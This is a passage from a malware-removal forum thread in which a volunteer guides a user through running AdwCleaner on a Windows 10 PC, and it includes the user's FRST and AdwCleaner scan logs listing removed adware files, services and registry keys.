S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [118112 2015-10-30] (Microsoft Corporation)

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2017-04-29 01:45 - 2017-04-29 01:45 - 00000400 _____ C:\Users\palaboy\Desktop\Scan_170429-014525.txt
2017-04-29 01:45 - 2017-04-29 01:45 - 00000400 _____ C:\Users\palaboy\Desktop\Scan_170429-014434.txt
2017-04-29 01:38 - 2017-04-29 01:38 - 00001078 _____ C:\Users\palaboy\Desktop\start emergency kit scanner - Shortcut.lnk
2017-04-29 01:37 - 2017-04-29 01:45 - 00000000 ____D C:\EEK
2017-04-29 01:37 - 2017-04-29 01:36 - 295932560 _____ C:\Users\palaboy\Desktop\EmsisoftEmergencyKit.exe
2017-04-29 00:46 - 2017-04-29 00:46 - 00000000 ____D C:\Users\palaboy\AppData\Local\Macromedia
2017-04-29 00:06 - 2017-04-29 00:06 - 00192216 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2017-04-29 00:05 - 2017-04-29 00:05 - 00109272 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamchameleon.sys
2017-04-29 00:05 - 2017-04-29 00:05 - 00000000 ____D C:\Users\palaboy\Desktop\mbar-1.09.3.1001
2017-04-28 23:48 - 2017-04-28 23:48 - 00000000 ____D C:\Users\palaboy\AppData\Roaming\Sun
2017-04-28 23:45 - 2017-04-29 00:26 - 00000000 ____D C:\Users\palaboy\AppData\LocalLow\Mozilla
2017-04-28 23:43 - 2017-04-28 23:43 - 00000000 ____D C:\Users\palaboy\AppData\Local\ActiveSync
2017-04-28 23:42 - 2017-04-28 23:42 - 00000000 ____D C:\Users\palaboy\AppData\Local\CEF
2017-04-28 23:41 - 2017-04-28 23:41 - 00000000 ____D C:\Windows\AppReadiness
2017-04-28 23:30 - 2017-04-28 23:30 - 00004042 _____ C:\Windows\System32\Tasks\Samsung Update
2017-04-28 23:26 - 2017-04-28 23:26 - 00000000 ____D C:\Alitkojck
2017-04-28 23:24 - 2017-04-29 01:46 - 00000000 ____D C:\FRST
2017-04-28 23:21 - 2017-04-28 23:21 - 00188296 _____ C:\Users\palaboy\Desktop\ReportRogue.txt
2017-04-28 22:57 - 2017-04-28 23:50 - 00028272 _____ C:\Windows\system32\Drivers\TrueSight.sys
2017-04-28 22:56 - 2017-04-28 22:56 - 00000899 _____ C:\Users\Public\Desktop\RogueKiller.lnk
2017-04-28 22:56 - 2017-04-28 22:56 - 00000000 ____D C:\Program Files\RogueKiller
2017-04-28 22:45 - 2017-04-28 22:46 - 00004606 _____ C:\Users\palaboy\Desktop\Rkill.txt
2017-04-28 22:19 - 2017-04-28 22:19 - 00000000 ___HD C:\$AV_AVG
2017-04-28 20:16 - 2017-04-28 20:16 - 00000000 ____D C:\Users\palaboy\Desktop\Old Firefox Data
2017-04-28 20:15 - 2017-04-28 20:15 - 00001216 _____ C:\Users\Public\Desktop\Mozilla Firefox.lnk
2017-04-28 20:15 - 2017-04-28 20:15 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2017-04-28 20:03 - 2017-04-28 20:14 - 00246056 _____ (Mozilla) C:\Users\palaboy\Downloads\Firefox Setup Stub 53.0.exe
2017-04-28 19:58 - 2017-04-28 19:58 - 00000000 ____D C:\Users\palaboy\Downloads\Internet Download Manager IDM 6.28 Build 8 Crack Only
2017-04-28 19:57 - 2017-04-28 19:57 - 01724745 _____ C:\Users\palaboy\Downloads\Internet Download Manager IDM 6.28 Build 8 Crack Only.zip
2017-04-28 19:53 - 2017-04-28 19:53 - 00000000 ____D C:\Users\palaboy\Downloads\IDM_6.28_Build_8_Crack_Free_Download_Silent_No_Patch_SadeemPC
2017-04-28 19:39 - 2017-04-29 00:49 - 00000000 ____D C:\Users\palaboy\AppData\Roaming\IDM
2017-04-28 19:39 - 2017-04-28 19:39 - 00001078 _____ C:\Users\palaboy\Desktop\Internet Download Manager.lnk
2017-04-28 19:39 - 2017-04-28 19:39 - 00000000 ____D C:\Users\palaboy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Download Manager
2017-04-28 19:39 - 2017-04-28 19:39 - 00000000 ____D C:\Program Files (x86)\Internet Download Manager
2017-04-28 19:38 - 2017-04-28 19:38 - 07163016 _____ (Tonec Inc.) C:\Users\palaboy\Downloads\idman628build8.exe
2017-04-28 19:27 - 2017-04-28 19:27 - 00000000 ____D C:\Program Files\PC Robotics
2017-04-28 14:21 - 2017-04-28 14:29 - 00000803 _____ C:\Users\palaboy\Desktop\Bills to Pay.txt
2017-04-27 23:33 - 2016-10-17 23:35 - 00223464 _____ (Tonec Inc.) C:\Windows\system32\Drivers\idmwfp.sys
2017-04-27 18:34 - 2017-04-27 18:34 - 00000000 _____ C:\Windows\SysWOW64\11
2017-04-27 02:02 - 2017-04-27 02:02 - 00048944 ____N (Dropbox, Inc.) C:\Windows\system32\DbxSvc.exe
2017-04-14 22:26 - 2017-04-27 19:25 - 00089837 ____H C:\Users\palaboy\AppData\Local\IconCache.db.backup
2017-04-14 18:12 - 2017-04-14 18:12 - 00001241 _____ C:\Users\palaboy\Desktop\Facebook Gameroom.lnk
2017-04-14 18:12 - 2017-04-14 18:12 - 00000000 ____D C:\Users\palaboy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Facebook
2017-04-14 18:12 - 2017-04-14 18:12 - 00000000 ____D C:\Users\palaboy\AppData\Local\Facebook
2017-04-14 18:06 - 2017-04-14 18:10 - 00252088 _____ (Facebook) C:\Users\palaboy\Downloads\FacebookGameroom.exe
2017-04-14 17:04 - 2017-04-14 17:15 - 00000214 _____ C:\Windows\Tasks\CreateExplorerShellUnelevatedTask.job
2017-04-14 17:04 - 2017-04-14 17:14 - 00223254 _____ C:\Windows\ntbtlog.txt
2017-04-14 17:00 - 2017-04-14 17:00 - 00000000 ___RD C:\Users\palaboy\Desktop\mbam-setup-1.61.0.1400 with Crack[Adios]
2017-04-14 16:56 - 2017-04-14 16:56 - 00001178 _____ C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2017-04-14 16:56 - 2017-04-14 16:56 - 00000000 ____D C:\Users\palaboy\AppData\Roaming\Malwarebytes
2017-04-14 16:56 - 2017-04-14 16:56 - 00000000 ____D C:\Program Files (x86)\Malwarebytes' Anti-Malware
2017-04-14 16:56 - 2012-04-04 15:56 - 00024904 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2017-04-14 16:53 - 2017-04-28 23:41 - 00000000 ___RD C:\Users\palaboy\Dropbox
2017-04-14 16:42 - 2017-04-14 16:43 - 00690080 _____ (Dropbox, Inc.) C:\Users\palaboy\Downloads\DropboxInstaller.exe
2017-04-12 06:04 - 2017-04-12 06:04 - 00000000 ____D C:\Users\palaboy\AppData\Roaming\AVG
2017-04-12 06:01 - 2017-04-12 06:01 - 00004008 _____ C:\Windows\System32\Tasks\Antivirus Emergency Update
2017-04-12 06:00 - 2017-04-28 19:25 - 00557912 _____ (AVG Technologies CZ, s.r.o.) C:\Windows\system32\Drivers\avgsp.sys
2017-04-12 06:00 - 2017-04-28 19:25 - 00129776 _____ (AVG Technologies CZ, s.r.o.) C:\Windows\system32\Drivers\avgmonflt.sys
2017-04-12 06:00 - 2017-04-12 05:58 - 00340688 _____ (AVG Technologies CZ, s.r.o.) C:\Windows\system32\Drivers\avgVmm.sys
2017-04-12 06:00 - 2017-04-12 05:58 - 00165048 _____ (AVG Technologies CZ, s.r.o.) C:\Windows\system32\Drivers\avgStm.sys
2017-04-12 06:00 - 2017-04-12 05:58 - 00102136 _____ (AVG Technologies CZ, s.r.o.) C:\Windows\system32\Drivers\avgRdr2.sys
2017-04-12 06:00 - 2017-04-12 05:58 - 00076688 _____ (AVG Technologies CZ, s.r.o.) C:\Windows\system32\Drivers\avgRvrt.sys
2017-04-12 06:00 - 2017-04-12 05:58 - 00039288 _____ (AVG Technologies CZ, s.r.o.) C:\Windows\system32\Drivers\avgHwid.sys
2017-04-12 06:00 - 2017-04-12 05:56 - 01006040 _____ (AVG Technologies CZ, s.r.o.) C:\Windows\system32\Drivers\avgSnx.sys
2017-04-12 06:00 - 2017-04-12 05:56 - 00336408 _____ (AVG Technologies CZ, s.r.o.) C:\Windows\system32\Drivers\avgbloga.sys
2017-04-12 06:00 - 2017-04-12 05:56 - 00050848 _____ (AVG Technologies CZ, s.r.o.) C:\Windows\system32\Drivers\avgbuniva.sys
2017-04-12 06:00 - 2017-04-12 05:55 - 00310056 _____ (AVG Technologies CZ, s.r.o.) C:\Windows\system32\Drivers\avgbidsdrivera.sys
2017-04-12 06:00 - 2017-04-12 05:55 - 00192096 _____ (AVG Technologies CZ, s.r.o.) C:\Windows\system32\Drivers\avgbidsha.sys
2017-04-12 06:00 - 2017-04-12 05:55 - 00166136 _____ (AVG Technologies CZ, s.r.o.) C:\Windows\system32\Drivers\avgbdiska.sys
2017-04-12 05:59 - 2017-04-12 05:58 - 00400928 _____ (AVG Technologies CZ, s.r.o.) C:\Windows\system32\avgBoot.exe
2017-04-12 05:51 - 2017-04-27 15:30 - 00000955 _____ C:\Users\Public\Desktop\AVG.lnk
2017-04-12 05:48 - 2017-04-28 15:39 - 00003668 _____ C:\Windows\System32\Tasks\AVG EUpdate Task
2017-04-12 05:48 - 2017-04-12 05:51 - 00000000 ____D C:\Program Files (x86)\AVG
2017-04-12 05:47 - 2017-04-12 05:47 - 00000552 _____ C:\Users\palaboy\AppData\Local\TroubleshooterConfig.json
2017-04-12 05:40 - 2017-04-12 05:51 - 00000000 ____D C:\Users\palaboy\AppData\Local\AvgSetupLog
2017-04-12 05:40 - 2017-04-12 05:40 - 00000000 ____D C:\Users\palaboy\AppData\Local\Avg
2017-04-12 04:33 - 2017-04-12 04:33 - 00034328 _____ (Sysinternals - www.sysinternals.com) C:\Windows\system32\Drivers\PROCEXP152.SYS
2017-04-12 04:32 - 2017-04-29 00:01 - 00000000 _____ C:\Users\Public\Documents\temp.dat
2017-04-12 04:32 - 2017-04-28 22:19 - 00000000 _____ C:\Users\Public\Documents\report.dat
2017-04-12 04:32 - 2017-04-12 04:32 - 00000000 ____D C:\Windows\SysWOW64\{F5461AD9-4035-4FB3-899A-A3498960C91E}
2017-04-12 03:58 - 2017-04-12 03:58 - 00000000 ____D C:\Users\palaboy\.android
2017-04-12 03:57 - 2017-04-12 05:06 - 00000000 ____D C:\Users\palaboy\.VirtualBox
2017-04-12 03:50 - 2017-04-12 03:57 - 00000000 _____ C:\hsrv.txt
2017-04-12 03:49 - 2017-04-12 03:49 - 20316248 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerInstaller.exe
2017-04-05 21:14 - 2017-04-05 21:15 - 00000000 ____D C:\Users\TEMP
2017-04-05 21:14 - 2017-04-05 21:14 - 00000000 ____D C:\Users\TEMP\AppData\Local\TileDataLayer

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2017-04-29 01:04 - 2016-02-27 03:33 - 00004170 _____ C:\Windows\System32\Tasks\User_Feed_Synchronization-{FD1EFA04-C794-40DD-8A02-DC4E00D1A2AD}
2017-04-29 00:32 - 2016-02-27 02:07 - 00879220 _____ C:\Windows\system32\PerfStringBackup.INI
2017-04-29 00:32 - 2015-10-30 15:21 - 00000000 ____D C:\Windows\INF
2017-04-29 00:26 - 2016-02-27 02:27 - 00000000 __SHD C:\Users\palaboy\IntelGraphicsProfiles
2017-04-29 00:25 - 2016-02-27 02:01 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2017-04-29 00:24 - 2016-02-27 03:34 - 00000000 ____D C:\Users\palaboy\AppData\Roaming\DMCache
2017-04-29 00:24 - 2015-10-30 17:14 - 00000000 ____D C:\Windows\ServiceProfiles
2017-04-29 00:24 - 2015-10-30 14:28 - 00524288 ___SH C:\Windows\system32\config\BBI
2017-04-29 00:05 - 2016-02-27 03:34 - 00000000 ____D C:\Users\palaboy\Downloads\Compressed
2017-04-29 00:00 - 2016-03-25 18:43 - 00000008 __RSH C:\Users\palaboy\ntuser.pol
2017-04-29 00:00 - 2016-02-27 02:11 - 00000000 ____D C:\Users\palaboy
2017-04-28 23:57 - 2016-10-15 05:41 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2017-04-28 23:57 - 2015-10-30 15:24 - 00000000 ___HD C:\Windows\system32\GroupPolicy
2017-04-28 23:49 - 2016-03-04 14:03 - 00000000 ____D C:\Program Files (x86)\Java
2017-04-28 23:48 - 2016-03-04 14:03 - 00097856 _____ (Oracle Corporation) C:\Windows\SysWOW64\WindowsAccessBridge-32.dll
2017-04-28 23:45 - 2016-03-04 11:21 - 00000000 ____D C:\Users\palaboy\AppData\Roaming\Mozilla
2017-04-28 23:41 - 2016-03-04 11:21 - 00000000 ____D C:\Users\palaboy\AppData\Local\Mozilla
2017-04-28 23:41 - 2016-02-27 02:26 - 00000000 ____D C:\Intel
2017-04-28 23:41 - 2015-10-30 15:24 - 00000000 ____D C:\Windows\appcompat
2017-04-28 23:40 - 2017-03-25 02:08 - 00000000 ___HD C:\$WINDOWS.~BT
2017-04-28 23:30 - 2016-08-15 00:44 - 00000000 ____D C:\Users\palaboy\AppData\Local\CrashDumps
2017-04-28 20:23 - 2015-10-30 15:11 - 00000000 ____D C:\Windows\CbsTemp
2017-04-28 15:52 - 2016-02-27 17:58 - 00000000 ____D C:\Windows\Panther
2017-04-28 12:42 - 2015-10-30 15:24 - 00000000 ___HD C:\Program Files\WindowsApps
2017-04-27 19:36 - 2016-07-08 17:37 - 00000000 ____D C:\Users\palaboy\AppData\Local\Citrix
2017-04-27 19:29 - 2015-10-30 15:24 - 00000000 __RHD C:\Users\Public\Libraries
2017-04-27 19:26 - 2016-08-02 03:34 - 00000000 ____D C:\Users\palaboy\AppData\Roaming\Audacity
2017-04-27 19:26 - 2016-03-04 11:23 - 00000000 ____D C:\Users\palaboy\AppData\Roaming\Skype
2017-04-27 19:26 - 2016-03-04 11:03 - 00000000 ____D C:\Users\palaboy\AppData\LocalLow\Adobe
2017-04-27 19:26 - 2016-02-29 10:28 - 00000000 ___HD C:\Program Files (x86)\Temp
2017-04-27 19:26 - 2016-02-27 03:16 - 00000000 ____D C:\Users\palaboy\AppData\Local\Big Fish
2017-04-27 19:26 - 2016-02-27 02:31 - 00000000 ____D C:\Users\palaboy\AppData\Local\Comms
2017-04-27 19:26 - 2016-02-27 02:22 - 00000000 ____D C:\Users\palaboy\AppData\Local\MicrosoftEdge
2017-04-27 19:26 - 2016-02-27 02:12 - 00000000 ____D C:\Users\palaboy\AppData\Roaming\Adobe
2017-04-27 19:26 - 2016-02-27 02:12 - 00000000 ____D C:\Users\palaboy\AppData\Local\VirtualStore
2017-04-27 19:26 - 2015-10-30 15:24 - 00000000 __RSD C:\Windows\Media
2017-04-27 19:26 - 2015-10-30 15:24 - 00000000 ___SD C:\Windows\SysWOW64\DiagSvcs
2017-04-27 19:26 - 2015-10-30 15:24 - 00000000 ___SD C:\Windows\SysWOW64\Configuration
2017-04-27 19:26 - 2015-10-30 15:24 - 00000000 ___RD C:\Windows\ImmersiveControlPanel
2017-04-27 19:26 - 2015-10-30 15:24 - 00000000 ____D C:\Windows\SysWOW64\setup
2017-04-27 19:26 - 2015-10-30 15:24 - 00000000 ____D C:\Windows\SysWOW64\MUI
2017-04-27 19:26 - 2015-10-30 15:24 - 00000000 ____D C:\Windows\SysWOW64\Macromed
2017-04-27 19:26 - 2015-10-30 15:24 - 00000000 ____D C:\Windows\SysWOW64\Com
2017-04-27 19:26 - 2015-10-30 15:24 - 00000000 ____D C:\Windows\security
2017-04-27 19:26 - 2015-10-30 15:24 - 00000000 ____D C:\Windows\Registration
2017-04-27 19:26 - 2015-10-30 15:24 - 00000000 ____D C:\Windows\InputMethod
2017-04-27 19:26 - 2015-10-30 15:24 - 00000000 ____D C:\Windows\Help
2017-04-27 19:25 - 2015-10-30 15:24 - 00000000 ____D C:\Program Files\Common Files\microsoft shared
2017-04-21 12:44 - 2015-10-30 15:24 - 00000000 ____D C:\Windows\system32\NDF
2017-04-14 19:20 - 2016-02-27 09:02 - 00000000 ____D C:\Windows\system32\MRT
2017-04-14 19:18 - 2016-02-27 09:02 - 148601744 ____C (Microsoft Corporation) C:\Windows\system32\MRT.exe
2017-04-14 19:15 - 2015-10-30 15:24 - 00000167 _____ C:\Windows\win.ini
2017-04-14 17:09 - 2017-01-21 19:11 - 00000000 ___HD C:\Users\palaboy\AppData\Roaming\com
2017-04-12 03:49 - 2016-08-09 21:17 - 00004386 _____ C:\Windows\System32\Tasks\Adobe Flash Player Updater
2017-04-12 03:49 - 2015-10-30 15:24 - 00000000 ____D C:\Windows\system32\Macromed
2017-04-08 06:06 - 2016-02-27 08:50 - 00532136 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe
2017-04-05 21:22 - 2016-02-27 10:48 - 00000000 ____D C:\Users\palaboy\AppData\Local\ElevatedDiagnostics
2017-04-05 21:14 - 2016-02-27 02:12 - 00000000 __RHD C:\Users\Public\AccountPictures
2017-04-02 03:05 - 2015-10-30 15:26 - 00835576 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2017-04-02 03:05 - 2015-10-30 15:26 - 00177656 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2017-04-01 02:40 - 2016-03-04 10:55 - 00000000 ____D C:\Users\palaboy\AppData\Local\Adobe

==================== Files in the root of some directories =======

2016-08-23 17:27 - 2016-08-23 18:56 - 0000600 _____ () C:\Users\palaboy\AppData\Local\PUTTY.RND
2017-04-12 05:47 - 2017-04-12 05:47 - 0000552 _____ () C:\Users\palaboy\AppData\Local\TroubleshooterConfig.json
2016-02-29 10:28 - 2016-02-29 10:28 - 0000000 ____H () C:\ProgramData\DP45977C.lfl

==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2017-04-27 16:49

==================== End of FRST.txt ============================

 

 

Is the computer showing any signs of malware now? --> So far, everything looks good. Are there any more steps that I need to do?

 

Please let me know. Many thanks!



#8 fireman4it

fireman4it

    Bleepin' Fireman


  • Malware Response Team
  • 13,505 posts
  • Gender:Male
  • Location:Greenup, Ill USA
  • Local time:09:01 PM

Posted 01 May 2017 - 07:25 AM

One more check for any leftovers.
 
Please download AdwCleaner by Xplode and save to your Desktop.
  • Double-click on AdwCleaner.exe to run the tool.
    Vista/Windows 7/8 users right-click and select Run As Administrator.
  • The tool will start to update its database...please wait until complete.
  • Click on the Scan button.
  • AdwCleaner will begin...be patient as the scan may take some time to complete.
  • After the scan has finished, click on the Logfile button...a report (AdwCleaner[SX].txt) will open in Notepad (where the largest value of X represents the most recent report).
  • After reviewing the log, click on the Clean button.
  • Press OK when asked to close all programs and follow the onscreen prompts.
  • Press OK again to allow AdwCleaner to restart the computer and complete the removal process.
  • After rebooting, a logfile report (AdwCleaner[CX].txt) will open automatically (where the largest value of X represents the most recent report).
  • Copy and paste the contents of AdwCleaner[CX].txt in your next reply.
  • A copy of all logfiles is saved to C:\AdwCleaner.

" Extinguishing Malware from the world"

The Virus, Trojan, Spyware, and Malware Removal forum is very busy. If I'm helping you and I've not posted back within 24 hrs., send a PM with your topic link. Thank you.

ALL OTHER HELP REQUESTS VIA THE PM SYSTEM WILL BE IGNORED. The Forums are there for a reason!
Thanks-


If I have helped you, consider making a donation to help me continue the fight against Malware!


#9 palaboyako

palaboyako
  • Topic Starter

  • Members
  • 13 posts
  • Local time:10:01 AM

Posted 03 May 2017 - 03:27 AM

Hello,

 

Here it is: AdwCleaner[C2].txt

 

# AdwCleaner v6.046 - Logfile created 03/05/2017 at 16:22:35
# Updated on 24/04/2017 by Malwarebytes
# Database : 2017-05-02.1 [Server]
# Operating System : Windows 10 Pro  (X64)
# Username : palaboy - WIN10
# Running from : C:\Users\palaboy\Desktop\adwcleaner_6.046.exe
# Mode: Clean
# Support : https://www.malwarebytes.com/support



***** [ Services ] *****

[-] Service deleted: SNARE


***** [ Folders ] *****

[-] Folder deleted: C:\Program Files\PC Robotics
[-] Folder deleted: C:\Users\palaboy\AppData\Local\app


***** [ Files ] *****

[-] File deleted: C:\Windows\SysNative\drivers\TAOKernelEx64.sys
[-] File deleted: C:\TOSTACK
[-] File deleted: C:\Windows\rsrcs.dll
[-] File deleted: C:\Users\Public\Documents\temp.dat
[-] File deleted: C:\Users\Public\Documents\report.dat


***** [ DLL ] *****



***** [ WMI ] *****



***** [ Shortcuts ] *****

[-] Shortcut disinfected: C:\Users\palaboy\Desktop\Tor Browser\Start Tor Browser.lnk
[-] Shortcut disinfected: C:\Users\palaboy\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Microsoft Edge.lnk


***** [ Scheduled Tasks ] *****

[-] Task deleted: Samsung Update


***** [ Registry ] *****

[-] Key deleted: HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\SNARE
[#] Key deleted on reboot: [x64] HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\SNARE
[-] Key deleted: HKLM\SOFTWARE\Classes\AppID\{7F46C358-270D-4791-A579-AD1DDA1A3F7B}
[-] Key deleted: HKLM\SOFTWARE\Classes\CLSID\{BD6ECB00-7C4A-4F97-B425-44117F2A7AAE}
[-] Key deleted: HKLM\SOFTWARE\Classes\CLSID\{E4ADC61E-D06A-4E0E-8582-78C809CC8450}
[-] Key deleted: HKLM\SOFTWARE\Classes\TypeLib\{EB2BEAEF-150C-4DE4-9D09-F16403C22769}
[-] Key deleted: HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{BD6ECB00-7C4A-4F97-B425-44117F2A7AAE}
[-] Key deleted: HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{BD6ECB00-7C4A-4F97-B425-44117F2A7AAE}
[-] Key deleted: HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{BD6ECB00-7C4A-4F97-B425-44117F2A7AAE}
[-] Key deleted: HKU\.DEFAULT\Software\UpgSvr
[-] Key deleted: HKU\S-1-5-21-3175129382-567401783-3479919610-1001\Software\Installer
[-] Key deleted: HKU\S-1-5-21-3175129382-567401783-3479919610-1001\Software\AutoTime
[-] Key deleted: HKU\S-1-5-21-3175129382-567401783-3479919610-1001\Software\dlr
[-] Key deleted: HKU\S-1-5-21-3175129382-567401783-3479919610-1001\Software\PopWnd
[-] Key deleted: HKU\S-1-5-21-3175129382-567401783-3479919610-1001\Software\UpgSvr
[#] Key deleted on reboot: HKU\S-1-5-18\Software\UpgSvr
[#] Key deleted on reboot: HKCU\Software\Installer
[#] Key deleted on reboot: HKCU\Software\AutoTime
[#] Key deleted on reboot: HKCU\Software\dlr
[#] Key deleted on reboot: HKCU\Software\PopWnd
[#] Key deleted on reboot: HKCU\Software\UpgSvr
[-] Key deleted: HKLM\SOFTWARE\ScreenShot
[#] Key deleted on reboot: [x64] HKCU\Software\Installer
[#] Key deleted on reboot: [x64] HKCU\Software\AutoTime
[#] Key deleted on reboot: [x64] HKCU\Software\dlr
[#] Key deleted on reboot: [x64] HKCU\Software\PopWnd
[#] Key deleted on reboot: [x64] HKCU\Software\UpgSvr
[-] Key deleted: [x64] HKLM\SOFTWARE\InterSect Alliance
[-] Key deleted: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\3DCCCD6BD02558446B24CF1C63EC213C
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\3DCCCD6BD02558446B24CF1C63EC213C
[-] Data restored: [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\Main [Start Page]
[-] Key deleted: HKLM\SYSTEM\CurrentControlSet\Control\Class\{0C95ABFE-4FB6-49DB-B22F-0E1F5FC4BEEC}
[-] Key deleted: HKLM\SYSTEM\CurrentControlSet\Control\Class\{EEEFACB3-729F-4484-B66D-E7A7917BBFC1}
[-] Key deleted: HKEY_CLASSES_ROOT\.qmgc
[-] Value deleted: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost [WinSAPSvc]
[-] Value deleted: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost [Kitty]


***** [ Web browsers ] *****



*************************

:: "Tracing" keys deleted
:: Winsock settings cleared

*************************

C:\AdwCleaner\AdwCleaner[C1].txt - [6557 Bytes] - [19/04/2016 02:59:31]
C:\AdwCleaner\AdwCleaner[C2].txt - [4251 Bytes] - [03/05/2017 16:22:35]
C:\AdwCleaner\AdwCleaner[S1].txt - [6263 Bytes] - [19/04/2016 02:58:24]
C:\AdwCleaner\AdwCleaner[S2].txt - [4542 Bytes] - [03/05/2017 16:20:37]

########## EOF - C:\AdwCleaner\AdwCleaner[C2].txt - [4470 Bytes] ##########
 



#10 fireman4it

fireman4it

    Bleepin' Fireman


  • Malware Response Team
  • 13,505 posts
  • Gender:Male
  • Location:Greenup, Ill USA
  • Local time:09:01 PM

Posted 03 May 2017 - 01:50 PM

How is your computer running now?


#11 palaboyako

palaboyako
  • Topic Starter

  • Members
  • 13 posts
  • Local time:10:01 AM

Posted 17 May 2017 - 02:59 AM

My desktop is performing better and I'm not able to see any more unwanted processes or software being installed.

 

My laptop, though, is having the same thing. I'm trying to follow the instructions except for the FRST, as I don't have the logs to use.

 

Let me know if I need to start a new thread...


Edited by palaboyako, 17 May 2017 - 03:35 AM.


#12 palaboyako

palaboyako
  • Topic Starter

  • Members
  • 13 posts
  • Local time:10:01 AM

Posted 17 May 2017 - 05:44 AM

I'm getting a lot of unwanted pop-ups. New pages I will never go to...

b-inspiration-prosperity-men something is the pop-up.

 

Please see attached logs...

Attached Files


Edited by palaboyako, 17 May 2017 - 06:15 AM.


#13 fireman4it

fireman4it

    Bleepin' Fireman


  • Malware Response Team
  • 13,505 posts
  • Gender:Male
  • Location:Greenup, Ill USA
  • Local time:09:01 PM

Posted 19 May 2017 - 11:37 AM

Is this from the Desktop or Laptop?